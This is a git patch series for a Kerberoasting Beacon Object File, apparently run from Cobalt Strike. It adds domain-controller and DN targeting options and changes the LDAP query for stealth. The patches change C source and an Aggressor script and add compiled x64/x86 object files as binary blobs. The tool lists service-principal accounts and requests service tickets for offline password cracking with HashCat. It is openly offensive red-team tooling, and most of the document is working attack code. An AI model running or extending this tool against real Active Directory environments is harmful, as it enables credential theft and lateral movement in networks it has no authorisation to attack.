From 738c5ab29c652062b4b630e0c42947804671184a Mon Sep 17 00:00:00 2001 From: nviso-facar Date: Wed, 28 Aug 2024 14:18:23 +0200 Subject: [PATCH 1/3] Added custom DC / DN specification for the roast command, plus small OPSEC change in the roast LDAP query --- BOF/Kerberoast/Kerberoast.cna | 24 ++++++++---- BOF/Kerberoast/Kerberoast.x64.o | Bin 0 -> 15025 bytes BOF/Kerberoast/Kerberoast.x86.o | Bin 0 -> 14259 bytes BOF/Kerberoast/SOURCE/Kerberoast.c | 59 ++++++++++++++++++----------- 4 files changed, 53 insertions(+), 30 deletions(-) create mode 100644 BOF/Kerberoast/Kerberoast.x64.o create mode 100644 BOF/Kerberoast/Kerberoast.x86.o diff --git a/BOF/Kerberoast/Kerberoast.cna b/BOF/Kerberoast/Kerberoast.cna index 196b11c..65c471b 100644 --- a/BOF/Kerberoast/Kerberoast.cna +++ b/BOF/Kerberoast/Kerberoast.cna @@ -5,7 +5,9 @@ #register help beacon_command_register("Kerberoast", "Perform Kerberoasting against all (or specified) SPN enabled accounts.", "List all SPN enabled user/service accounts or request service tickets (TGS-REP) which can be cracked offline using HashCat.\n\n" . - "Synopsis: Kerberoast [list, list-no-aes, roast or roast-no-aes] [account ]\n\n" . + "Synopsis: Kerberoast [list, list-no-aes, roast or roast-no-aes] [account ] [DC hostname/IP ] [DN ]\n" . + "Example 1: Kerberoast roast svc_sql \n" . + "Example 2: Kerberoast roast svc_sql dc1.domain.local CN=domain,CN=local #listing cross-domain is not implemented\n\n" . "WARNING: Listing and roasting tickets without sAMAccountName filter is OPSEC UNSAFE!\n\n"); alias Kerberoast { @@ -16,6 +18,8 @@ alias Kerberoast { $action = @args[0]; $filter = @args[1]; + $dc = @args[2]; + $dn = @args[3]; if ($action eq "") { berror($bid, "Please specify an action (list, list-no-aes, roast or roast-no-aes)."); @@ -27,14 +31,18 @@ alias Kerberoast { $data = readb($handle, -1); closef($handle); - # Pack our arguments - if ($filter eq "") { - $arg_data = bof_pack($bid, "Z", $action); - } - else { - $arg_data = bof_pack($bid, "ZZ", $action, $filter); - } + # Pack our arguments + if ($filter eq "") { + $arg_data = bof_pack($bid, "Z", $action); + } else if ($dc eq "") { + $arg_data = bof_pack($bid, "ZZ", $action, $filter); + } else if ($dn eq "") { + $arg_data = bof_pack($bid, "ZZZ", $action, $filter, $dc); + } else { + $arg_data = bof_pack($bid, "ZZZZ", $action, $filter, $dc, $dn); + } blog($bid, "Kerberoast BOF by Outflank"); beacon_inline_execute($bid, $data, "go", $arg_data); } + diff --git a/BOF/Kerberoast/Kerberoast.x64.o b/BOF/Kerberoast/Kerberoast.x64.o new file mode 100644 index 0000000000000000000000000000000000000000..b18eb69dc9cf37492876f90892c929f7be4e007d GIT binary patch literal 15025 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 JS4Oz%`(LvDsi^<} literal 0 HcmV?d00001 diff --git a/BOF/Kerberoast/Kerberoast.x86.o b/BOF/Kerberoast/Kerberoast.x86.o new file mode 100644 index 0000000000000000000000000000000000000000..0cfdd92aa53f735280ea7a4981145d210b5eb2d7 GIT binary patch literal 14259 zcmcIr4RBo5b-rt@WZ5W4U;z#ox{x*gsU=IYaBO2!$!i z&b{~D_x4BFGi}%Gd*3_f+;h%7=iHxnS2R0{7=13TW^4^dPDiDo_Zb|E%f6c#b2=C+ zUnZU};pSph`zpO2!()>x2KL@!BLLR1s^QB0;czB3_vt9fg)$X3FJ#Q0tFLZ#ZDxBH z9?ve#q`_|8>gu~Ph#S#|OOQK`zS4*MCAp6HuiB2KYw?)UW{8oBrT=Some6xfT%wm9 zhiX!d?qYhtonpaKPB*UXIl9b_MAId4Z6-P}!}^O8+RWs4K}~9)O;bCvMD0j68JmXg zxYI3LCba2zqq{7j72{Sy(zEz*X~<_w$A%*d;ACMPJ34hQcP_yad&;uKk|o0P(`+X?ftKaHl#q|bwJIq|?JKR%C0>~4#`bu`&=`Ybv7+V!}^fA-N! zW?-~aL{4ebbTjSORV8kqzLE13nqMCWz3JDM9baY^vl^#DydNsP@_B7p0tJ}&Gw@RyJoQ?3&J)xaUbUckq;qA=^|T|ERQ~W+(gxJX&y?a`*YA|`Ue?RrqQ%> z>NcDB=gEGC_#iKzwrILm6$`JDgjSv+FEJi?rE@p&n9$0|(*#Bdaz(0b#*nYbd|rZ6 zeaOO9RSX|~W~{a197~^oyRzoZzB%11K$MX}aN=4zI*?|O zh1}`MQ3v&R1U+*lwM)1y$xa%cGs+gv#q-Dxg0YtF8O0V&yW`qKbYOxR(!ya_kmjlB z(I1GWbB(0P4djO{!p_MOXh>;q@Rr&z*`|8e-b!g_fWdkd0_epXaqVo9#_o7hyAapL zQrgR$-{@XN_oVhR`nNoxjpOD{Xk*lAxU@tHsZyoxg06a9fM;7pk$9GmRp>MHChCgu zA1dPdEWUGUdp0GdohC)H71AhMi#dtUuhc7y7n%eo?)`5}k7D8;E_y*pY2zfA(#FJXl;2`+ zp&3U`cN$XCACwqk=lqy7*|Jz1*G8fPBUE?bu*u!m(j-$%&jnZ`Cb!}_6>Ejc`CzAF zdlcFSG=UVPwD+iGD%LFRA|+T;Fh_R0M-fO4QEQ4(Qr~8W9}(RXcu`cmocN2m?#OzmaO8k6L=J}7ao%_ilNn7K1+!{VV7d{99?Ed zrgqr$J@LQSC)L8c;@*^#_bAW!8jlW)vj`8xN#T-h5}kYsi;@g!S#pSij9Bsx%XOYK z%4*4sa(PCSf0(QK9;l`*N9l>%EF+5(rV(4hP$qnKEIskFYfvR`;}X@z9FvX(%DLr< zBvqbhoqXmDIeNd?H)Oh1rgWW#>xtN_ki-tDH1;<7k{S(<0$<^jGH7Q*kVGbakmKz zjVco^GM1X~CgWxkmKvodEGdnxf!UOHiSnJ&E{Gcs*W?5qtS*#cSlT028heZQSB%

u|1pxUU5E}`U`8{h(B$CsHBMCV1v6;0W>~q9DM@r( zK&7ayht&h@=g@7W4@GCoTInMTFa)e_Z^-I)WSPubD>ez^rfS-JTdF6E@cLq@Xv|ho zk(v0#kT(0k6{&if{9&P8(fwCY|?d4d8HDnHD%eb&8$0Do5 z=36CJY?au8(pV7Dkz;UjCve^*w-(2TPSOZ$Er}03%|Tgw=sN`J%Hy$90Lj=Ou5ikk zjFG4n@n{+=aq01YMK-%qv7_M4XTRXmzj)>Zo@gpZaA>j=F9TdgXd-F5rZOvY&t}Dm zl27XRc)j3o&Jm!g`z#gT|11?F1#_xcloT$iMG9+e9#U5A{^_T)vy*X{Gza*?(%4}< zn$f2U${+m_%ysctAH`zm2z625*lCW55|6#iF`tBy1FWup2X)UOtXSm`{wL0hZc|vn zOlLBO7hF0%i~-K4U@2098dL3!JsCV#25(~qZ*2z8mBHI#=at5~Fuf&sFQS)cBU^LK8`54eoM?CAmgXKNKNLk*vgjLz&AWg$5~Z%Ox+@ zcev0MYWjHy{a@BJ#m90NE8j|6O<%%GA$pZ(X`5UKKdk6c<}$SO2rU$^quIP=6xE3Z zBC4mr%@fs^P(?OJNO}%Oj&VtIAv4W&h9i$&mbWa-~6>uAlD+Ij}!f%q|40-(aSOW zPdq5;auOtZE77+|x}4dFew65yk}eC3=x2z2qom776Mc;6pQeRBvJQw|j%9M+b0+}iC)XrsPizE2zE`!sFbF%li-g`6D>I%vo%Oye2K_mlDgD5uHw*udz=h}pqE zK`y~NLOjnLhWS?KY7N_k?S`Fs3{z@pvqPyp3lHq6H5TFBj?xP6-XQPJPr-9K(kYxc zN4jtTV627)bH6lR$dgaUZ*rs`$MzDfp~IYwVMx7P5E;!ao3b>Q%(bUKHZXHNugc09 zN+N%8tI8`(?+JaS(Sb3>4-lyr2s6F87}hJV+GLR0DBTHdB1`uS9cplnE!L*4a%OxvIb(hill<7FT=bZ~ zUA{@df-^iR}!3uOo~Za~t+UcrBbkjj_pZ;=)B&kmz6@(K0D27uKo0 zT>K6aKb=P$Ka%hTcuA1b|<;od6!y{m1mgiIxKg^wv`Cc4hQ5j((7{d*7VH!7t zla8}78t9aK;#a?+tn(Av{%gdHGtoFPJBw5CLFyuXm-@qO+b*rGqq*Hx)wi^2oxg8` zD-V&i>79|#nwmZcj6la?IBP*nZX*EpLxIwvrR05E45gW zBjbUj&JLhui1kCVm&=9m9Dwvv=m?|D?f9BH>Y=?8{0Jn-3P~Dh9fa%#R?R9|4ZiDG zEvv%48voX?yYO!e28b!%QPM{%49DnKAxL) z{-mSTJ&4{q9&g6Jy7B>6N7xrQ;A(EHZ*_I~{DvOlm4{Qyhj15T#f!dJ^lnh8H`EITY#$pM>w`Z& z-j>Gbe(=4hZ80hj@w|CiJ0vJt_+6WG4Au+|jmSVAS{IL{AKXs%HC!Wzr=_76o_W!p zEEuQ{9ao0v>g*uCA?8AbWcpN%IuhTt7?ahIsKS`sfNPb!+S{XUP>T;h>a*gu04-f| z?x1Qi+vLyF0yek&mFgwCrDe;?kUevA+p^^C8J$}`U!-%TEq^|%GO~MN#w)iTaxIv$ z+2c(}QuJN&Uj@d$Ju8-PS3CF8EWHA`6*Gj@Ud%c{J`TOGk*UwcM?6(4Rio(ZMpSPQ zW1}C^G`~}|>cH)+31e+Ls3T?Lkg32^4Rn%b(kE=xquqK=qmkNxZ>{vC5&Ebt>1&2` zJ!YH@Y&HIgRnfd-7VB*F7~Q<9)#lWnuSJGrAn0n`kzbnj071l-RwoVCt>xhW*0oSD zXf(EISQ{u)UC2TNnKb0wPpka_^h4|>bj(r|-E19Ry~`8vQ+BX&H3S3nM@f}gz0CF& zA|X#$dYq9yR~KJ+;gKJ;LN!Qpus{{?Cy0o9;497D)HhM5b92bwrocgu-{*CCLI)x} zdcauaiiCC7GQTfuEL$b+6@g%dM-S6uDChy*6%0vevRsFJMz_loa0Pn}UohbDyF8*U zUCT3TbcI~G(Fex1HZ*K-E#JDMV}+}_s^X9@u%^aUQ&m%4Rb5?0zLnDjAIITc%yFdH zaZ8EQdBQ<61Y`8eJiQOnIU}pTwm3F#^XCe;MhoW6zI`5I*muz1MKN|Q_)pqpv_}h~ z&Vq#Fe0{3^ZITqaut{a7@J9S1?n>Xh=edLnq;KHcf_M0z;;#6Ou=lR8NB*3_m(HO- z4?Rkz;D&jmg!~!7cRkKrF5?Gn#oxyL`Il>L{R&)0FSJPy(tMTZp4V*rHfb<&`liG0SRuCLhTCe zSLk6NX%`3qfRt>V@xZUTt@M6Zaw03oGyB$bG<131$1Kq*pzOHD02J{6^qu-H5 z+w(x8?FWkXk&>H_GZP`V2uR4?3?%wNf0HO;aIccPPsu&6Xs;;RgLsz}`nrIGf8Pai zbFbc4+<#QuLQE%uI|wA&o&*wY#}#)2%4;dtQV%5j`wEbV^P@nb?H>V&wtodAG{2*` zKT+II6?ajI+4dG7(RM44XnVindKLEx#a#xYcXF>D23p3^aUkK#H*k}_01165#r=E5 zy{xzkF~2P5T5eV76c7YZu`dD%eQzq-j}&cO(Iyp*m6~k}fkfLSigvrAty8p3indSD zx)tpaMSC1b^yn3!72LlMfL3z!TObh^t;~$e9w5<=eL%vOIFQittm3|)xUVbPIYqmq zXcIu9?e&-%1zH9qY^(+nHX0OdyP|m%?O`C%_M}3mfkYNIVX77SG$5hRr)b9%dP<>J z6#B73|D@2z3SEb(TWG#jp?ekD1thE;RAdr|l|4`8$0}}Jqt3a!`miHC+qCy`6Rd6m% zDFUqo5}NCP#LU&MX#0SKe~&2INhSBPqMcQ8X++$y;T+Z5NMP!ACP zLkx~6+T%c?HeLl<&AAs8_aYGfLyOxGC}C|Skf41VsETv{1E`v#g;?flIJ!fj4GQg2 zNCy)7dVxe83@X~U742^o?Hxt?XGQyWMWY2&=qmvd{@to*E_j6L82g4sg?belROnTO zE-J*ZD-dnn3W3SjbGkd2i_HTk--mKRdq6J31vcaQoq2Xj2PjQg#f8i++QWjf#A#Bt z_yXRx)*a!yuxeU*_Cuxu^(H6>f_TK|MdU$H?Ei-WIalD=i)dWpQs%|}e;2?d$Y7Dn z`q=-E0k{O2d$C?+etcU!q5Yl%I#Ef_Jm&9hGeWwjhgt{<@j`TwAEGk$$MT78g7Q)h zm&8-rE(z(F5D8dpd)G){rk?vrydS((>=X)RoQ%^*3&_=W!@Hou6*KjfNn`EOClOAu!Qlw zyRK$kcH3s0X8U>LTFGkI_2t%f9*_QBW3w;d3H9@!QR>Z!hiLfFPDzew1WkKsxO$4*4sc}mv*n`o7GO_bSAY}hY rfpT5iLin>{N3|F12>4Xa)c_HLpb`I1U8^S))@8~psz!%fod)|K+d_TM literal 0 HcmV?d00001 diff --git a/BOF/Kerberoast/SOURCE/Kerberoast.c b/BOF/Kerberoast/SOURCE/Kerberoast.c index 18da0aa..c1351af 100755 --- a/BOF/Kerberoast/SOURCE/Kerberoast.c +++ b/BOF/Kerberoast/SOURCE/Kerberoast.c @@ -208,7 +208,7 @@ HRESULT FindSPNs(_In_ IDirectorySearch *pContainerToSearch, _In_ BOOL bListSPNs, BOOL bResult = FALSE, bRoast = FALSE; WCHAR wcSearchFilter[BUF_SIZE] = { 0 }; LPCWSTR lpwFormat = L"(&(objectClass=user)(objectCategory=person)%ls(!(userAccountControl:1.2.840.113556.1.4.803:=2))(servicePrincipalName=*)(sAMAccountName=%ls))"; - LPCWSTR lpwFormatNoListSpn = L"(&(objectClass=user)(objectCategory=person)%ls(!(userAccountControl:1.2.840.113556.1.4.803:=2))(sAMAccountName=%ls))"; + LPCWSTR lpwFormatNoListSpn = L"(&(objectClass=user)(objectCategory=person)%ls(sAMAccountName=%ls))"; PUSER_INFO pUserInfo = NULL; INT iCount = 0; DWORD x = 0L; @@ -507,7 +507,7 @@ HRESULT FindSPNs(_In_ IDirectorySearch *pContainerToSearch, _In_ BOOL bListSPNs, return hr; } -HRESULT SearchDirectory(_In_ BOOL bListSPNs, _In_ BOOL bExcludeAES, _In_ LPCWSTR lpwFilter) { +HRESULT SearchDirectory(_In_ BOOL bListSPNs, _In_ BOOL bExcludeAES, _In_ LPCWSTR lpwFilter, _In_ LPCWSTR lpwDC, _In_ LPCWSTR lpwDN) { HRESULT hr = S_OK; HINSTANCE hModule = NULL; IADs* pRoot = NULL; @@ -537,28 +537,38 @@ HRESULT SearchDirectory(_In_ BOOL bListSPNs, _In_ BOOL bExcludeAES, _In_ LPCWSTR hr = OLE32$IIDFromString(pIADsIID, &IADsIID); hr = OLE32$IIDFromString(pIDirectorySearchIID, &IDirectorySearchIID); - // Get rootDSE and the current user's domain container DN. - hr = ADsOpenObject(L"LDAP://rootDSE", - NULL, - NULL, - ADS_USE_SEALING | ADS_USE_SIGNING | ADS_SECURE_AUTHENTICATION, // Use Kerberos encryption - &IADsIID, - (void**)&pRoot); - if (FAILED(hr)) { - BeaconPrintf(CALLBACK_ERROR, "Failed to get rootDSE.\n"); - goto CleanUp; - } + // Construct the LDAP path + if (lpwDC != NULL && lpwDN != NULL) { // Use DC and DN if provided + MSVCRT$swprintf_s(wcPathName, BUF_SIZE, L"LDAP://%ls/%ls", lpwDC, lpwDN); + BeaconPrintf(CALLBACK_OUTPUT, "wcPathName 1: %ls\n", wcPathName); + } else if (lpwDC != NULL && lpwDN == NULL) { + MSVCRT$swprintf_s(wcPathName, BUF_SIZE, L"LDAP://%ls", lpwDC); + BeaconPrintf(CALLBACK_OUTPUT, "wcPathName no DN: %ls\n", wcPathName); + } else { + // Get rootDSE and the current user's domain container DN. + hr = ADsOpenObject(L"LDAP://rootDSE", + NULL, + NULL, + ADS_USE_SEALING | ADS_USE_SIGNING | ADS_SECURE_AUTHENTICATION, // Use Kerberos encryption + &IADsIID, + (void**)&pRoot); + if (FAILED(hr)) { + BeaconPrintf(CALLBACK_ERROR, "Failed to get rootDSE.\n"); + goto CleanUp; + } + + OLEAUT32$VariantInit(&var); + hr = pRoot->lpVtbl->Get(pRoot, (BSTR)L"defaultNamingContext", &var); + if (FAILED(hr)) { + BeaconPrintf(CALLBACK_ERROR, "Failed to get defaultNamingContext."); + goto CleanUp; + } - OLEAUT32$VariantInit(&var); - hr = pRoot->lpVtbl->Get(pRoot, (BSTR)L"defaultNamingContext", &var); - if (FAILED(hr)) { - BeaconPrintf(CALLBACK_ERROR, "Failed to get defaultNamingContext."); - goto CleanUp; + MSVCRT$wcscpy_s(wcPathName, _countof(wcPathName), L"LDAP://"); + MSVCRT$wcscat_s(wcPathName, _countof(wcPathName), var.bstrVal); + BeaconPrintf(CALLBACK_OUTPUT, "wcPathName no extras: %ls\n", wcPathName); } - MSVCRT$wcscpy_s(wcPathName, _countof(wcPathName), L"LDAP://"); - MSVCRT$wcscat_s(wcPathName, _countof(wcPathName), var.bstrVal); - hr = ADsOpenObject((LPCWSTR)wcPathName, NULL, NULL, @@ -595,6 +605,8 @@ VOID go(IN PCHAR Args, IN ULONG Length) { BOOL bExcludeAES = FALSE; LPCWSTR lpwArgs = NULL; LPCWSTR lpwFilter = NULL; + LPCWSTR lpwDC = NULL; + LPCWSTR lpwDN = NULL; // Parse Arguments datap parser; @@ -602,6 +614,9 @@ VOID go(IN PCHAR Args, IN ULONG Length) { lpwArgs = (WCHAR*)BeaconDataExtract(&parser, NULL); lpwFilter = (WCHAR*)BeaconDataExtract(&parser, NULL); + lpwDC = (WCHAR*)BeaconDataExtract(&parser, NULL); + lpwDN = (WCHAR*)BeaconDataExtract(&parser, NULL); + if (lpwArgs != NULL && MSVCRT$_wcsicmp(lpwArgs, L"list") == 0) { bListSPNs = TRUE; } @@ -621,7 +636,7 @@ VOID go(IN PCHAR Args, IN ULONG Length) { lpwFilter = L"*"; } - hr = SearchDirectory(bListSPNs, bExcludeAES, lpwFilter); + hr = SearchDirectory(bListSPNs, bExcludeAES, lpwFilter, lpwDC, lpwDN); if (FAILED(hr)) { GetFormattedErrMsg(hr); } From 17f7d5eb38508fa00e05ac90300021e6c2036550 Mon Sep 17 00:00:00 2001 From: nviso-facar Date: Wed, 28 Aug 2024 16:16:46 +0200 Subject: [PATCH 2/3] Changed CNA script to inform that added options are only available for roast commandss --- BOF/Kerberoast/Kerberoast.cna | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/BOF/Kerberoast/Kerberoast.cna b/BOF/Kerberoast/Kerberoast.cna index 65c471b..d0b71e0 100644 --- a/BOF/Kerberoast/Kerberoast.cna +++ b/BOF/Kerberoast/Kerberoast.cna @@ -5,9 +5,9 @@ #register help beacon_command_register("Kerberoast", "Perform Kerberoasting against all (or specified) SPN enabled accounts.", "List all SPN enabled user/service accounts or request service tickets (TGS-REP) which can be cracked offline using HashCat.\n\n" . - "Synopsis: Kerberoast [list, list-no-aes, roast or roast-no-aes] [account ] [DC hostname/IP ] [DN ]\n" . + "Synopsis: Kerberoast [list, list-no-aes, roast or roast-no-aes] [account ] [DC hostname/IP ] [DN ]\n" . "Example 1: Kerberoast roast svc_sql \n" . - "Example 2: Kerberoast roast svc_sql dc1.domain.local CN=domain,CN=local #listing cross-domain is not implemented\n\n" . + "Example 2: Kerberoast roast svc_sql dc1.domain.local CN=domain,CN=local \n\n" . "WARNING: Listing and roasting tickets without sAMAccountName filter is OPSEC UNSAFE!\n\n"); alias Kerberoast { From 586fb70a9d33e709dc3b68ee818b7ba4557b69d2 Mon Sep 17 00:00:00 2001 From: nviso-facar Date: Wed, 28 Aug 2024 17:03:52 +0200 Subject: [PATCH 3/3] Removed debug artifacts and rebuilt binaries --- BOF/Kerberoast/Kerberoast.cna | 2 +- BOF/Kerberoast/Kerberoast.x64.o | Bin 15025 -> 14805 bytes BOF/Kerberoast/Kerberoast.x86.o | Bin 14259 -> 14031 bytes BOF/Kerberoast/SOURCE/Kerberoast.c | 5 +---- 4 files changed, 2 insertions(+), 5 deletions(-) diff --git a/BOF/Kerberoast/Kerberoast.cna b/BOF/Kerberoast/Kerberoast.cna index d0b71e0..550676a 100644 --- a/BOF/Kerberoast/Kerberoast.cna +++ b/BOF/Kerberoast/Kerberoast.cna @@ -8,7 +8,7 @@ beacon_command_register("Kerberoast", "Perform Kerberoasting against all (or spe "Synopsis: Kerberoast [list, list-no-aes, roast or roast-no-aes] [account ] [DC hostname/IP ] [DN ]\n" . "Example 1: Kerberoast roast svc_sql \n" . "Example 2: Kerberoast roast svc_sql dc1.domain.local CN=domain,CN=local \n\n" . - "WARNING: Listing and roasting tickets without sAMAccountName filter is OPSEC UNSAFE!\n\n"); + "WARNING: Listing users without sAMAccountName filter is OPSEC UNSAFE!\n\n"); alias Kerberoast { $bid = $1; diff --git a/BOF/Kerberoast/Kerberoast.x64.o b/BOF/Kerberoast/Kerberoast.x64.o index b18eb69dc9cf37492876f90892c929f7be4e007d..1e382522a6818408ea13797979ebeb8ea18cfba4 100644 GIT binary patch delta 843 zcmZXSUr1AN6vxkRZn`bRLB_T_H|@{#s&lqEF%+VOgIf)@Ac$Z=%gro?NV`HJHfb!l 